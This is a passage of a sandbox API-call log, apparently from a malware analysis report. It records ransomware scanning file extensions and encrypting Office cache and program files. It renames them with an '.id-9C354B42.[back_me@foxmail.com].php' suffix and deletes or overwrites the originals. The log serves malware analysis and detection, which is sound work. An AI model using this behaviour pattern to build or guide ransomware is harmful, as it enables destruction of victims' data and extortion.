(lpString=".1cd") returned 4 [0052.226] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0052.226] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0052.226] lstrlenW (lpString=".jpg") returned 4 [0052.226] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0052.226] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0052.226] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0052.226] lstrlenW (lpString=".doc") returned 4 [0052.226] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0052.226] lstrlenW (lpString=".docx") returned 5 [0052.226] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0052.226] lstrlenW (lpString=".pdf") returned 4 [0052.226] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0052.226] lstrlenW (lpString=".xls") returned 4 [0052.226] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0052.226] lstrlenW (lpString=".xlsx") returned 5 [0052.226] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0052.226] lstrlenW (lpString=".ppt") returned 4 [0052.226] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0052.226] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0052.226] lstrlenW (lpString=".zip") returned 4 [0052.226] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0052.226] lstrlenW (lpString=".rar") returned 4 [0052.226] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0052.226] lstrlenW (lpString=".bz2") returned 4 [0052.227] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0052.227] lstrlenW (lpString=".7z") returned 3 [0052.227] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0052.227] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0052.227] lstrlenW (lpString=".dbf") returned 4 [0052.227] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0052.227] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0052.227] lstrlenW (lpString=".1cd") returned 4 [0052.227] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0052.227] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0052.227] lstrlenW (lpString=".jpg") returned 4 [0052.227] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0052.227] lstrcmpiW (lpString1=".xrm-ms", lpString2=".php") returned 1 [0052.227] lstrlenW (lpString="pkeyconfig-office.xrm-ms") returned 24 [0052.227] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0052.227] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=715834) returned 1 [0052.227] CloseHandle (hObject=0x20c) returned 1 [0052.228] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 0x2020 [0052.228] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0052.228] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0052.228] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.228] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.228] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0052.228] GetLastError () returned 0x0 [0052.228] ReadFile (in: hFile=0x20c, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0xaec3a, lpOverlapped=0x0) returned 1 [0052.253] WriteFile (in: hFile=0x204, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xaec40, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0xaec40, lpOverlapped=0x0) returned 1 [0052.503] ReadFile (in: hFile=0x20c, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.503] WriteFile (in: hFile=0x204, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0x104, lpOverlapped=0x0) returned 1 [0052.503] SetEndOfFile (hFile=0x204) returned 1 [0052.503] CloseHandle (hObject=0x204) returned 1 [0052.503] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.503] SetEndOfFile (hFile=0x20c) returned 1 [0052.509] CloseHandle (hObject=0x20c) returned 1 [0052.509] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0052.510] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 1 [0052.510] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0052.510] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0052.510] lstrlenW (lpString=".doc") returned 4 [0052.510] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0052.510] lstrlenW (lpString=".docx") returned 5 [0052.510] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0052.510] lstrlenW (lpString=".pdf") returned 4 [0052.510] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0052.510] lstrlenW (lpString=".xls") returned 4 [0052.510] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0052.510] lstrlenW (lpString=".xlsx") returned 5 [0052.510] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0052.510] lstrlenW (lpString=".ppt") returned 4 [0052.510] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0052.510] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0052.510] lstrlenW (lpString=".zip") returned 4 [0052.510] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0052.510] lstrlenW (lpString=".rar") returned 4 [0052.510] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0052.511] lstrlenW (lpString=".bz2") returned 4 [0052.511] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0052.511] lstrlenW (lpString=".7z") returned 3 [0052.511] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0052.511] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0052.511] lstrlenW (lpString=".dbf") returned 4 [0052.511] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0052.511] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0052.511] lstrlenW (lpString=".1cd") returned 4 [0052.511] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0052.511] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0052.511] lstrlenW (lpString=".jpg") returned 4 [0052.511] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0052.511] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0052.511] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0052.511] lstrlenW (lpString=".doc") returned 4 [0052.511] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0052.511] lstrlenW (lpString=".docx") returned 5 [0052.511] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0052.511] lstrlenW (lpString=".pdf") returned 4 [0052.511] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0052.511] lstrlenW (lpString=".xls") returned 4 [0052.512] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0052.512] lstrlenW (lpString=".xlsx") returned 5 [0052.512] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0052.512] lstrlenW (lpString=".ppt") returned 4 [0052.512] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0052.512] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0052.512] lstrlenW (lpString=".zip") returned 4 [0052.512] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0052.512] lstrlenW (lpString=".rar") returned 4 [0052.512] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0052.512] lstrlenW (lpString=".bz2") returned 4 [0052.512] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0052.512] lstrlenW (lpString=".7z") returned 3 [0052.512] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0052.512] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0052.512] lstrlenW (lpString=".dbf") returned 4 [0052.512] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0052.512] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0052.512] lstrlenW (lpString=".1cd") returned 4 [0052.512] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0052.512] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0052.512] lstrlenW (lpString=".jpg") returned 4 [0052.512] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0052.512] lstrcmpiW (lpString1=".msi", lpString2=".php") returned -1 [0052.512] lstrlenW (lpString="VisiorWW.msi") returned 12 [0052.513] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0052.513] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=12060672) returned 1 [0052.513] CloseHandle (hObject=0x20c) returned 1 [0052.513] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi")) returned 0x2020 [0052.513] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0052.513] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0052.513] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.msi.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0052.514] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc6c | out: lpNewFilePointer=0x0) returned 1 [0052.514] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0052.514] ReadFile (in: hFile=0x20c, lpBuffer=0x44e0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x44e0058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0052.518] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x3d5800, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0052.518] ReadFile (in: hFile=0x20c, lpBuffer=0x4520058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x4520058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0052.527] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x3d5fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0052.527] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0xb40800, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0052.527] ReadFile (in: hFile=0x20c, lpBuffer=0x4560058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x4560058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0052.542] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.542] WriteFile (in: hFile=0x20c, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x3d5fcb0, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0052.830] SetEndOfFile (hFile=0x20c) returned 1 [0052.830] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x432d940 [0052.830] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.830] WriteFile (in: hFile=0x20c, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.831] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x3d5800, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.831] WriteFile (in: hFile=0x20c, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.837] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0xb40800, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.837] WriteFile (in: hFile=0x20c, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.840] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x432d940 | out: hHeap=0xb10000) returned 1 [0052.840] CloseHandle (hObject=0x20c) returned 1 [0052.840] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0052.840] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0052.840] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0052.840] lstrlenW (lpString=".doc") returned 4 [0052.840] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0052.840] lstrlenW (lpString=".docx") returned 5 [0052.840] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0052.840] lstrlenW (lpString=".pdf") returned 4 [0052.840] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0052.840] lstrlenW (lpString=".xls") returned 4 [0052.840] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0052.840] lstrlenW (lpString=".xlsx") returned 5 [0052.841] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0052.841] lstrlenW (lpString=".ppt") returned 4 [0052.841] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0052.841] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0052.841] lstrlenW (lpString=".zip") returned 4 [0052.841] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0052.841] lstrlenW (lpString=".rar") returned 4 [0052.841] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0052.841] lstrlenW (lpString=".bz2") returned 4 [0052.841] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0052.841] lstrlenW (lpString=".7z") returned 3 [0052.841] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0052.841] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0052.841] lstrlenW (lpString=".dbf") returned 4 [0052.841] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0052.841] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0052.841] lstrlenW (lpString=".1cd") returned 4 [0052.841] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0052.841] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0052.841] lstrlenW (lpString=".jpg") returned 4 [0052.841] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0052.841] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0052.841] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0052.841] lstrlenW (lpString=".doc") returned 4 [0052.841] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0052.841] lstrlenW (lpString=".docx") returned 5 [0052.841] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0052.841] lstrlenW (lpString=".pdf") returned 4 [0052.841] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0052.841] lstrlenW (lpString=".xls") returned 4 [0052.842] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0052.842] lstrlenW (lpString=".xlsx") returned 5 [0052.842] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0052.842] lstrlenW (lpString=".ppt") returned 4 [0052.842] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0052.842] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0052.842] lstrlenW (lpString=".zip") returned 4 [0052.842] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0052.842] lstrlenW (lpString=".rar") returned 4 [0052.842] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0052.842] lstrlenW (lpString=".bz2") returned 4 [0052.842] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0052.842] lstrlenW (lpString=".7z") returned 3 [0052.842] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0052.842] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0052.842] lstrlenW (lpString=".dbf") returned 4 [0052.842] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0052.842] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0052.842] lstrlenW (lpString=".1cd") returned 4 [0052.842] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0052.842] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 75 [0052.842] lstrlenW (lpString=".jpg") returned 4 [0052.842] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0052.842] lstrcmpiW (lpString1=".exe", lpString2=".php") returned -1 [0052.842] lstrlenW (lpString="archive.exe") returned 11 [0052.843] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\archive.exe" (normalized: "c:\\program files\\common files\\archive.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0052.843] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=75776) returned 1 [0052.843] CloseHandle (hObject=0x20c) returned 1 [0052.843] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\archive.exe" (normalized: "c:\\program files\\common files\\archive.exe")) returned 0x20 [0052.843] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\archive.exe.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\archive.exe.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0052.843] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\archive.exe" (normalized: "c:\\program files\\common files\\archive.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0052.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\archive.exe") returned 41 [0052.843] lstrlenW (lpString="C:\\Program Files\\Common Files\\archive.exe") returned 41 [0052.844] lstrlenW (lpString=".doc") returned 4 [0052.844] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0052.844] lstrlenW (lpString=".docx") returned 5 [0052.844] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0052.844] lstrlenW (lpString=".pdf") returned 4 [0052.844] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0052.844] lstrlenW (lpString=".xls") returned 4 [0052.844] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0052.844] lstrlenW (lpString=".xlsx") returned 5 [0052.844] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0052.844] lstrlenW (lpString=".ppt") returned 4 [0052.844] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0052.844] lstrlenW (lpString="C:\\Program Files\\Common Files\\archive.exe") returned 41 [0052.844] lstrlenW (lpString=".zip") returned 4 [0052.844] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0052.844] lstrlenW (lpString=".rar") returned 4 [0052.844] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0052.844] lstrlenW (lpString=".bz2") returned 4 [0052.844] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0052.844] lstrlenW (lpString=".7z") returned 3 [0052.844] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0052.844] lstrlenW (lpString="C:\\Program Files\\Common Files\\archive.exe") returned 41 [0052.844] lstrlenW (lpString=".dbf") returned 4 [0052.844] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0052.844] lstrlenW (lpString="C:\\Program Files\\Common Files\\archive.exe") returned 41 [0052.844] lstrlenW (lpString=".1cd") returned 4 [0052.844] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0052.844] lstrlenW (lpString="C:\\Program Files\\Common Files\\archive.exe") returned 41 [0052.844] lstrlenW (lpString=".jpg") returned 4 [0052.844] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0052.845] lstrlenW (lpString="C:\\Program Files\\Common Files\\archive.exe") returned 41 [0052.845] lstrlenW (lpString="C:\\Program Files\\Common Files\\archive.exe") returned 41 [0052.845] lstrlenW (lpString=".doc") returned 4 [0052.845] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0052.845] lstrlenW (lpString=".docx") returned 5 [0052.845] lstrcmpiW (lpString1=".docx", lpString2="e.exe") returned -1 [0052.845] lstrlenW (lpString=".pdf") returned 4 [0052.845] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0052.845] lstrlenW (lpString=".xls") returned 4 [0052.845] lstrcmpiW 